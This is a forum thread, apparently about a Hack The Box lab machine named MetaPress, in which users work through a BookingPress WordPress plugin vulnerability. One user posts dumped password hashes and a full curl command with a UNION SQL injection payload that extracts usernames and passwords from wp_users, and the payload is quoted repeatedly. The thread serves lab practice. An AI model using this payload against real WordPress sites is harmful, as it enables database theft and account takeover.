Posts: 74 Threads: 0 Joined: N/A October 29, 2022 at 6:56 PM Good luck everyone! Posts: 16 Threads: 0 Joined: N/A October 29, 2022 at 6:59 PM (October 29, 2022, 06:56 PM)11231123 Wrote: Good luck everyone! glgl Posts: 6 Threads: 0 Joined: N/A October 29, 2022 at 7:22 PM This appears to be working. Was able to grab DB information.
https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357 Posts: 16 Threads: 0 Joined: N/A October 29, 2022 at 7:26 PM (October 29, 2022, 07:22 PM)lightspeeder Wrote: This appears to be working. Was able to grab DB information.
https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357 not really Posts: 74 Threads: 0 Joined: N/A October 29, 2022 at 7:36 PM (October 29, 2022, 07:26 PM)elliotal53 Wrote: (October 29, 2022, 07:22 PM)lightspeeder Wrote: This appears to be working. Was able to grab DB information.
https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357
not really Works for me: admin:$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.
manager:$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70:partylikearockstar
Posts: 16 Threads: 0 Joined: N/A October 29, 2022 at 7:40 PM (October 29, 2022, 07:36 PM)11231123 Wrote: (October 29, 2022, 07:26 PM)elliotal53 Wrote: (October 29, 2022, 07:22 PM)lightspeeder Wrote: This appears to be working. Was able to grab DB information.
https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357
not really
Works for me:
admin:$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.
manager:$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70:partylikearockstar
how did you get it to work? mind explaining a bit more ? Posts: 74 Threads: 0 Joined: N/A October 29, 2022 at 7:50 PM (October 29, 2022, 07:40 PM)elliotal53 Wrote: (October 29, 2022, 07:36 PM)11231123 Wrote: (October 29, 2022, 07:26 PM)elliotal53 Wrote: (October 29, 2022, 07:22 PM)lightspeeder Wrote: This appears to be working. Was able to grab DB information.
https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357
not really
Works for me:
admin:$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.
manager:$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70:partylikearockstar
how did you get it to work? mind explaining a bit more ? Get a nonce and then just: curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
--data 'action=bookingpress_front_get_category_services&_wpnonce=<nonce>&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(user_login),group_concat(user_pass),@@version_compile_os,1,2,3,4,5,6 from wp_users-- -'
Posts: 16 Threads: 0 Joined: N/A October 29, 2022 at 7:55 PM (October 29, 2022, 07:50 PM)11231123 Wrote: (October 29, 2022, 07:40 PM)elliotal53 Wrote: (October 29, 2022, 07:36 PM)11231123 Wrote: (October 29, 2022, 07:26 PM)elliotal53 Wrote: (October 29, 2022, 07:22 PM)lightspeeder Wrote: This appears to be working. Was able to grab DB information.
https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357
not really
Works for me:
admin:$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.
manager:$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70:partylikearockstar
how did you get it to work? mind explaining a bit more ?
Get a nonce and then just:
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
--data 'action=bookingpress_front_get_category_services&_wpnonce=<nonce>&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(user_login),group_concat(user_pass),@@version_compile_os,1,2,3,4,5,6 from wp_users-- -'
{"variant":"error","title":"Error","msg":"Sorry, Your request can not process due to security reason."} Posts: 166 Threads: 0 Joined: N/A October 29, 2022 at 7:56 PM (October 29, 2022, 07:50 PM)11231123 Wrote: (October 29, 2022, 07:40 PM)elliotal53 Wrote: (October 29, 2022, 07:36 PM)11231123 Wrote: (October 29, 2022, 07:26 PM)elliotal53 Wrote: (October 29, 2022, 07:22 PM)lightspeeder Wrote: This appears to be working. Was able to grab DB information.
https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357
not really
Works for me:
admin:$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.
manager:$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70:partylikearockstar
how did you get it to work? mind explaining a bit more ?
Get a nonce and then just:
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
--data 'action=bookingpress_front_get_category_services&_wpnonce=<nonce>&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(user_login),group_concat(user_pass),@@version_compile_os,1,2,3,4,5,6 from wp_users-- -'
wow this worked ? here i get Sorry, Your request can not process due to security reason. Posts: 24 Threads: 0 Joined: N/A October 29, 2022 at 7:58 PM (October 29, 2022, 07:55 PM)elliotal53 Wrote: (October 29, 2022, 07:50 PM)11231123 Wrote: (October 29, 2022, 07:40 PM)elliotal53 Wrote: (October 29, 2022, 07:36 PM)11231123 Wrote: (October 29, 2022, 07:26 PM)elliotal53 Wrote: not really
Works for me:
admin:$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.
manager:$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70:partylikearockstar
how did you get it to work? mind explaining a bit more ?
Get a nonce and then just:
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
--data 'action=bookingpress_front_get_category_services&_wpnonce=<nonce>&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(user_login),group_concat(user_pass),@@version_compile_os,1,2,3,4,5,6 from wp_users-- -'
{"variant":"error","title":"Error","msg":"Sorry, Your request can not process due to security reason."} you have to use the proper nonce value |
